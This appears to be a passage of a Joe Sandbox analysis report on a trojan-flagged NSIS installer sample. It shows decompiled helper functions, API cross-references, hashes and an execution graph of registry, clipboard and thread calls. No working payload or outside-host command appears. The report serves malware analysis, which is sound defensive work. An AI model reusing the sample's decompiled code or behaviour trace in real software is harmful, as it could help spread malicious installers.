                                                                                                                          0x00403c40
                                                                                                                          0x00403c48
                                                                                                                          0x00403c4b
                                                                                                                          0x00403c4d
                                                                                                                          0x00403c4d
                                                                                                                          0x00403c4d
                                                                                                                          0x00403c54
                                                                                                                          0x00403c66

                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                                                          • CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsxD40A.tmp, xrefs: 00403C5B
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsxD40A.tmp
                                                                                                                          • API String ID: 2962429428-2585843088
                                                                                                                          • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                          • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                                                          • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                          • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E0040603F(void* __eflags, intOrPtr _a4) {
                                                                                                                          				int _t11;
                                                                                                                          				signed char* _t12;
                                                                                                                          				intOrPtr _t18;
                                                                                                                          				intOrPtr* _t21;
                                                                                                                          				signed int _t23;
                                                                                                                          
                                                                                                                          				E00406668(0x425f50, _a4);
                                                                                                                          				_t21 = E00405FE2(0x425f50);
                                                                                                                          				if(_t21 != 0) {
                                                                                                                          					E004068EF(_t21);
                                                                                                                          					if(( *0x42a278 & 0x00000080) == 0) {
                                                                                                                          						L5:
                                                                                                                          						_t23 = _t21 - 0x425f50 >> 1;
                                                                                                                          						while(1) {
                                                                                                                          							_t11 = lstrlenW(0x425f50);
                                                                                                                          							_push(0x425f50);
                                                                                                                          							if(_t11 <= _t23) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t12 = E0040699E();
                                                                                                                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                          								E00405F83(0x425f50);
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								goto L1;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						E00405F37();
                                                                                                                          						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                                                          					}
                                                                                                                          					_t18 =  *_t21;
                                                                                                                          					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                          						goto L1;
                                                                                                                          					} else {
                                                                                                                          						goto L5;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L1:
                                                                                                                          				return 0;
                                                                                                                          			}








                                                                                                                          0x0040604b
                                                                                                                          0x00406056
                                                                                                                          0x0040605a
                                                                                                                          0x00406061
                                                                                                                          0x0040606d
                                                                                                                          0x0040607d
                                                                                                                          0x0040607f
                                                                                                                          0x00406097
                                                                                                                          0x00406098
                                                                                                                          0x0040609f
                                                                                                                          0x004060a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406083
                                                                                                                          0x0040608a
                                                                                                                          0x00406092
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040608a
                                                                                                                          0x004060a2
                                                                                                                          0x00000000
                                                                                                                          0x004060b6
                                                                                                                          0x0040606f
                                                                                                                          0x00406075
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406075
                                                                                                                          0x0040605c
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                                            • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75AA3420,?,75AA2EE0,00405D94,?,75AA3420,75AA2EE0,00000000), ref: 00405FF0
                                                                                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                          • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,75AA3420,?,75AA2EE0,00405D94,?,75AA3420,75AA2EE0,00000000), ref: 00406098
                                                                                                                          • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,75AA3420,?,75AA2EE0,00405D94,?,75AA3420,75AA2EE0), ref: 004060A8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                          • String ID: P_B
                                                                                                                          • API String ID: 3248276644-906794629
                                                                                                                          • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                          • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                                                          • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                          • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                          				int _t15;
                                                                                                                          				long _t16;
                                                                                                                          
                                                                                                                          				_t15 = _a8;
                                                                                                                          				if(_t15 != 0x102) {
                                                                                                                          					if(_t15 != 0x200) {
                                                                                                                          						_t16 = _a16;
                                                                                                                          						L7:
                                                                                                                          						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                                                                                          							_push(_t16);
                                                                                                                          							_push(6);
                                                                                                                          							 *0x423734 = _t16;
                                                                                                                          							E00404FFF();
                                                                                                                          						}
                                                                                                                          						L11:
                                                                                                                          						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                                                                                          					}
                                                                                                                          					if(IsWindowVisible(_a4) == 0) {
                                                                                                                          						L10:
                                                                                                                          						_t16 = _a16;
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          					_t16 = E00404F7F(_a4, 1);
                                                                                                                          					_t15 = 0x419;
                                                                                                                          					goto L7;
                                                                                                                          				}
                                                                                                                          				if(_a12 != 0x20) {
                                                                                                                          					goto L10;
                                                                                                                          				}
                                                                                                                          				E00404610(0x413);
                                                                                                                          				return 0;
                                                                                                                          			}





                                                                                                                          0x00405642
                                                                                                                          0x0040564c
                                                                                                                          0x00405668
                                                                                                                          0x0040568a
                                                                                                                          0x0040568d
                                                                                                                          0x00405693
                                                                                                                          0x0040569d
                                                                                                                          0x0040569e
                                                                                                                          0x004056a0
                                                                                                                          0x004056a6
                                                                                                                          0x004056a6
                                                                                                                          0x004056b0
                                                                                                                          0x00000000
                                                                                                                          0x004056be
                                                                                                                          0x00405675
                                                                                                                          0x004056ad
                                                                                                                          0x004056ad
                                                                                                                          0x00000000
                                                                                                                          0x004056ad
                                                                                                                          0x00405681
                                                                                                                          0x00405683
                                                                                                                          0x00000000
                                                                                                                          0x00405683
                                                                                                                          0x00405652
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405659
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                                            • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                          • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                                                          • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                          • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00405F83(WCHAR* _a4) {
                                                                                                                          				WCHAR* _t5;
                                                                                                                          				WCHAR* _t7;
                                                                                                                          
                                                                                                                          				_t7 = _a4;
                                                                                                                          				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                                                          				while( *_t5 != 0x5c) {
                                                                                                                          					_push(_t5);
                                                                                                                          					_push(_t7);
                                                                                                                          					_t5 = CharPrevW();
                                                                                                                          					if(_t5 > _t7) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					break;
                                                                                                                          				}
                                                                                                                          				 *_t5 =  *_t5 & 0x00000000;
                                                                                                                          				return  &(_t5[1]);
                                                                                                                          			}





                                                                                                                          0x00405f84
                                                                                                                          0x00405f8e
                                                                                                                          0x00405f91
                                                                                                                          0x00405f97
                                                                                                                          0x00405f98
                                                                                                                          0x00405f99
                                                                                                                          0x00405fa1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fa1
                                                                                                                          0x00405fa3
                                                                                                                          0x00405fab

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,80000000,00000003), ref: 00405F89
                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,80000000,00000003), ref: 00405F99
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                          • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                          • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                                                          • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                          • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                          				int _v8;
                                                                                                                          				int _t12;
                                                                                                                          				int _t14;
                                                                                                                          				int _t15;
                                                                                                                          				CHAR* _t17;
                                                                                                                          				CHAR* _t27;
                                                                                                                          
                                                                                                                          				_t12 = lstrlenA(_a8);
                                                                                                                          				_t27 = _a4;
                                                                                                                          				_v8 = _t12;
                                                                                                                          				while(lstrlenA(_t27) >= _v8) {
                                                                                                                          					_t14 = _v8;
                                                                                                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                          					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                          					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                          					if(_t15 == 0) {
                                                                                                                          						_t17 = _t27;
                                                                                                                          					} else {
                                                                                                                          						_t27 = CharNextA(_t27);
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					L5:
                                                                                                                          					return _t17;
                                                                                                                          				}
                                                                                                                          				_t17 = 0;
                                                                                                                          				goto L5;
                                                                                                                          			}









                                                                                                                          0x004060cd
                                                                                                                          0x004060cf
                                                                                                                          0x004060d2
                                                                                                                          0x004060fe
                                                                                                                          0x004060d7
                                                                                                                          0x004060e0
                                                                                                                          0x004060e5
                                                                                                                          0x004060f0
                                                                                                                          0x004060f3
                                                                                                                          0x0040610f
                                                                                                                          0x004060f5
                                                                                                                          0x004060fc
                                                                                                                          0x00000000
                                                                                                                          0x004060fc
                                                                                                                          0x00406108
                                                                                                                          0x0040610c
                                                                                                                          0x0040610c
                                                                                                                          0x00406106
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                                                                                          • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                          • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                                                          • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                          • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:23.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:99.6%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:470
                                                                                                                          Total number of Limit Nodes:50
                                                                                                                          execution_graph 90132 11334a3 TerminateThread 90133 11334ba 90132->90133 90115 1f9b1ab8 90116 1f9b1ae7 90115->90116 90119 1f9b0824 90116->90119 90118 1f9b1c0c 90120 1f9b082f 90119->90120 90121 1f9b212a 90120->90121 90122 1f9b4892 2 API calls 90120->90122 90123 1f9b48a0 2 API calls 90120->90123 90121->90118 90122->90121 90123->90121 90124 15106f5 90125 1510763 RegQueryValueExW 90124->90125 90127 15107cb 90125->90127 90134 1d64d01c 90135 1d64d034 90134->90135 90136 1d64d08e 90135->90136 90143 1f9bb15a 90135->90143 90155 1f9b69a0 90135->90155 90161 1f9b6ad0 90135->90161 90166 1f9b69b0 90135->90166 90172 1f9b468c 90135->90172 90176 1f9b469c 90135->90176 90144 1f9bb162 90143->90144 90145 1f9bb0e6 90143->90145 90146 1f9bb1c9 90144->90146 90148 1f9bb1b9 90144->90148 90145->90136 90217 1f9ba144 90146->90217 90187 1f9bb2f0 90148->90187 90194 1749f28 90148->90194 90199 1f9bb2e0 90148->90199 90206 1749f38 90148->90206 90211 174a004 90148->90211 90149 1f9bb1c7 90156 1f9b69b0 90155->90156 90157 1f9b468c GetModuleHandleW 90156->90157 90158 1f9b69e2 90157->90158 90159 1f9b469c 3 API calls 90158->90159 90160 1f9b69f7 90159->90160 90160->90136 90162 1f9b6ade 90161->90162 90165 1f9b6a92 90161->90165 90312 1f9b46c4 90162->90312 90164 1f9b6ae7 90164->90136 90165->90136 90167 1f9b69d6 90166->90167 90168 1f9b468c GetModuleHandleW 90167->90168 90169 1f9b69e2 90168->90169 90170 1f9b469c 3 API calls 90169->90170 90171 1f9b69f7 90170->90171 90171->90136 90173 1f9b4697 90172->90173 90174 1f9b46c4 GetModuleHandleW 90173->90174 90175 1f9b6ae7 90174->90175 90175->90136 90177 1f9b46a7 90176->90177 90178 1f9bb1c9 90177->90178 90180 1f9bb1b9 90177->90180 90179 1f9ba144 3 API calls 90178->90179 90181 1f9bb1c7 90179->90181 90182 174a004 3 API calls 90180->90182 90183 1f9bb2f0 3 API calls 90180->90183 90184 1f9bb2e0 3 API calls 90180->90184 90185 1749f38 3 API calls 90180->90185 90186 1749f28 3 API calls 90180->90186 90182->90181 90183->90181 90184->90181 90185->90181 90186->90181 90189 1f9bb2fe 90187->90189 90188 1f9ba144 3 API calls 90188->90189 90189->90188 90190 1f9bb3e7 90189->90190 90224 1048aba 90189->90224 90230 1048ac8 90189->90230 90236 1048cf8 90189->90236 90190->90149 90196 1749f38 90194->90196 90195 1749fd8 90195->90149 90295 1749ff0 90196->90295 90298 1749fe0 90196->90298 90201 1f9bb2f0 90199->90201 90200 1f9ba144 3 API calls 90200->90201 90201->90200 90202 1f9bb3e7 90201->90202 90203 1048ac8 OleGetClipboard 90201->90203 90204 1048cf8 OleGetClipboard 90201->90204 90205 1048aba OleGetClipboard 90201->90205 90202->90149 90203->90201 90204->90201 90205->90201 90207 1749f4c 90206->90207 90209 1749ff0 3 API calls 90207->90209 90210 1749fe0 3 API calls 90207->90210 90208 1749fd8 90208->90149 90209->90208 90210->90208 90212 1749fc2 90211->90212 90213 174a012 90211->90213 90215 1749ff0 3 API calls 90212->90215 90216 1749fe0 3 API calls 90212->90216 90214 1749fd8 90214->90149 90215->90214 90216->90214 90218 1f9ba14f 90217->90218 90219 1f9bb45a 90218->90219 90220 1f9bb504 90218->90220 90221 1f9bb4b2 CallWindowProcW 90219->90221 90223 1f9bb461 90219->90223 90222 1f9b469c 2 API calls 90220->90222 90221->90223 90222->90223 90223->90149 90226 1048ad4 90224->90226 90225 1048cef 90225->90189 90226->90225 90243 10492c2 90226->90243 90249 1049328 90226->90249 90255 1049338 90226->90255 90232 1048ad4 90230->90232 90231 1048cef 90231->90189 90232->90231 90233 10492c2 OleGetClipboard 90232->90233 90234 1049328 OleGetClipboard 90232->90234 90235 1049338 OleGetClipboard 90232->90235 90233->90232 90234->90232 90235->90232 90238 1048ad4 90236->90238 90239 1048cfb 90236->90239 90237 1048cef 90237->90189 90238->90237 90240 10492c2 OleGetClipboard 90238->90240 90241 1049328 OleGetClipboard 90238->90241 90242 1049338 OleGetClipboard 90238->90242 90239->90189 90240->90238 90241->90238 90242->90238 90245 10492cb 90243->90245 90244 1049354 90244->90226 90245->90244 90261 1049370 90245->90261 90272 1049380 90245->90272 90246 1049369 90246->90226 90251 1049340 90249->90251 90250 1049354 90250->90226 90251->90250 90253 1049370 OleGetClipboard 90251->90253 90254 1049380 OleGetClipboard 90251->90254 90252 1049369 90252->90226 90253->90252 90254->90252 90257 1049340 90255->90257 90256 1049354 90256->90226 90257->90256 90259 1049370 OleGetClipboard 90257->90259 90260 1049380 OleGetClipboard 90257->90260 90258 1049369 90258->90226 90259->90258 90260->90258 90262 1049380 90261->90262 90263 10493ad 90262->90263 90265 10493f1 90262->90265 90270 1049370 OleGetClipboard 90263->90270 90271 1049380 OleGetClipboard 90263->90271 90264 10493b3 90264->90246 90267 1049471 90265->90267 90283 1049558 90265->90283 90287 1049548 90265->90287 90266 104948f 90266->90246 90267->90246 90270->90264 90271->90264 90273 1049392 90272->90273 90274 10493ad 90273->90274 90276 10493f1 90273->90276 90281 1049370 OleGetClipboard 90274->90281 90282 1049380 OleGetClipboard 90274->90282 90275 10493b3 90275->90246 90278 1049471 90276->90278 90279 1049548 OleGetClipboard 90276->90279 90280 1049558 OleGetClipboard 90276->90280 90277 104948f 90277->90246 90278->90246 90279->90277 90280->90277 90281->90275 90282->90275 90285 104956d 90283->90285 90286 1049593 90285->90286 90291 1049084 90285->90291 90286->90266 90289 1049558 90287->90289 90288 1049084 OleGetClipboard 90288->90289 90289->90288 90290 1049593 90289->90290 90290->90266 90292 1049600 OleGetClipboard 90291->90292 90294 104969a 90292->90294 90296 174a001 90295->90296 90301 174b420 90295->90301 90296->90195 90299 174a001 90298->90299 90300 174b420 3 API calls 90298->90300 90299->90195 90300->90299 90304 1f9ba144 3 API calls 90301->90304 90305 1f9bb408 90301->90305 90302 174b43a 90302->90296 90304->90302 90306 1f9bb40d 90305->90306 90307 1f9bb45a 90306->90307 90308 1f9bb504 90306->90308 90309 1f9bb4b2 CallWindowProcW 90307->90309 90311 1f9bb461 90307->90311 90310 1f9b469c 2 API calls 90308->90310 90309->90311 90310->90311 90311->90302 90313 1f9b46cf 90312->90313 90314 1f9b37c8 GetModuleHandleW 90313->90314 90315 1f9b6bb7 90313->90315 90314->90315 90111 1510448 90112 151049a RegOpenKeyExW 90111->90112 90114 151050e 90112->90114 90128 1510ab8 90129 1510ad7 LdrInitializeThunk 90128->90129 90131 1510b0b 90129->90131 89764 1f9ba610 89765 1f9ba5c4 89764->89765 89766 1f9ba5cc DuplicateHandle 89765->89766 89768 1f9ba61b 89765->89768 89767 1f9ba5e6 89766->89767 90316 104713f 90319 1046dfc 90316->90319 90320 1046e07 90319->90320 90324 1047970 90320->90324 90328 1047960 90320->90328 90321 104714c 90325 10479bf 90324->90325 90332 1046f5c 90325->90332 90329 1047970 90328->90329 90330 1046f5c EnumThreadWindows 90329->90330 90331 1047a40 90330->90331 90331->90321 90333 1047a60 EnumThreadWindows 90332->90333 90335 1047a40 90333->90335 90335->90321 89769 10489c8 89770 10489d8 89769->89770 89773 10484dc 89770->89773 89774 1048a20 KiUserCallbackDispatcher 89773->89774 89776 10489df 89774->89776 89777 17412b8 89784 17417a8 89777->89784 89794 17416b0 89777->89794 89778 17412d3 89779 17412eb 89778->89779 89803 151f589 89778->89803 89814 151f5e0 89778->89814 89785 17417b6 89784->89785 89787 17416c9 89784->89787 89786 17417a2 89786->89778 89787->89786 89826 174b8c0 89787->89826 89830 174b8d0 89787->89830 89834 1741d40 89787->89834 89839 1741d50 89787->89839 89844 1747e48 89787->89844 89849 1747e39 89787->89849 89795 17416c9 89794->89795 89796 17417a2 89795->89796 89797 174b8d0 2 API calls 89795->89797 89798 174b8c0 2 API calls 89795->89798 89799 1741d50 8 API calls 89795->89799 89800 1741d40 8 API calls 89795->89800 89801 1747e48 5 API calls 89795->89801 89802 1747e39 5 API calls 89795->89802 89796->89778 89797->89795 89798->89795 89799->89795 89800->89795 89801->89795 89802->89795 89804 151f5a6 89803->89804 89805 151f5a0 89803->89805 89804->89779 89805->89804 90052 151e7e8 89805->90052 89809 151f7d5 90064 151e9d0 89809->90064 89811 151f7f6 89812 151e9d0 3 API calls 89811->89812 89813 151f836 89812->89813 89813->89779 89815 151f5ee 89814->89815 89817 151f611 89814->89817 89815->89779 89816 151f636 89816->89779 89817->89816 89818 151e7e8 3 API calls 89817->89818 89819 151f7b6 89818->89819 89820 151e988 3 API calls 89819->89820 89821 151f7d5 89820->89821 89822 151e9d0 3 API calls 89821->89822 89823 151f7f6 89822->89823 89824 151e9d0 3 API calls 89823->89824 89825 151f836 89824->89825 89825->89779 89827 174b8ea 89826->89827 89854 174bd20 89827->89854 89828 174b910 89828->89828 89831 174b8ea 89830->89831 89833 174bd20 2 API calls 89831->89833 89832 174b910 89833->89832 89835 1741d46 89834->89835 89836 1742359 89835->89836 89898 1742c70 89835->89898 89907 17411bc 89835->89907 89840 1741d71 89839->89840 89841 1742359 89840->89841 89842 1742c70 8 API calls 89840->89842 89843 17411bc 8 API calls 89840->89843 89842->89840 89843->89840 89845 1747e63 89844->89845 89846 17481c4 